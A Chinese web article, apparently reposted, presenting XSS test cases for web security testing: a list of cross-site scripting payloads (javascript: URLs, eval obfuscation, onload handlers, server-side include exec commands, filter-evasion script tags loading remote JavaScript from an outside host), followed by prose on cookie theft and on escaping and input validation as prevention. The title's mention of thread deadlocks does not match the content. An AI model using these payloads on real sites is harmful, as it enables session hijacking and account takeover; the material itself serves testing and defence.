多线程如何避免死锁 web安全性测试用例(12)

getURL("javascrīpt:alert(‘XSS‘)")

a="get";b="URL";c="javascrīpt:";d="alert(‘XSS‘);";eval(a+b+c+d);

<XML SRC="javascrīpt:alert(‘XSS‘);">

"> <BODY ōNLOAD="a();"><scrīpt>function a(){alert(‘XSS‘);}</scrīpt><"

<scrīpt SRC="/Article/UploadFiles/200608/20060827171609376.jpg"></scrīpt>

<IMG SRC="javascrīpt:alert(‘XSS‘)"

<!--#exec cmd="/bin/echo ‘<scrīpt SRC‘"--><!--#exec cmd="/bin/echo ‘=http://xss.ha.ckers.org/a.js></scrīpt>‘"-->

<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">

<scrīpt a=">" SRC="http://xss.ha.ckers.org/a.js"></scrīpt>

<scrīpt =">" SRC="http://xss.ha.ckers.org/a.js"></scrīpt>

<scrīpt a=">" ‘‘ SRC="http://xss.ha.ckers.org/a.js"></scrīpt>

<scrīpt "a=‘>‘" SRC="http://xss.ha.ckers.org/a.js"></scrīpt>

<scrīpt>document.write("<SCRI");</scrīpt>PT SRC="http://xss.ha.ckers.org/a.js"></scrīpt>

<A HREF=http://www.go>link</A>

最后,当用户浏览 时便会弹出一个警告框，内容显示的是浏览者当前的cookie串,这就说明该网站存在XSS漏洞。

试想如果我们注入的不是以上这个简单的测试代码，而是一段经常精心设计的恶意脚本，当用户浏览此帖时，cookie信息就可能成功的被 攻击者获取。此时浏览者的帐号就很容易被攻击者掌控了。

(2)如何预防XSS漏洞?

从应用程序的角度来讲,要进行以下几项预防:

对Javascrīpt,VB scrīpt, HTML,ActiveX, Flash等 语句或脚本进行转义.

在 服务端正式处理之前提交数据的合法性(合法性检查主要包括三项:数据类型,数据长度,敏感字符的校验)进行检查等。最根本的解决手段,在确认客户端的输入合法之前,服务端 拒绝进行关键性的处理操作.

从测试人员的角度来讲,要从需求检查和执行测试过程两个阶段来完成XSS检查:

在需求检查过程中对各输入项或输出项进行类型、长度以及取 值范围进行验证，着重验证是否对HTML或脚本代码进行了转义。

执行测试过程中也应对上述项进行检查。

本文来自电脑杂谈，转载请注明本文网址：
http://www.pc-fly.com/a/jisuanjixue/article-67715-12.html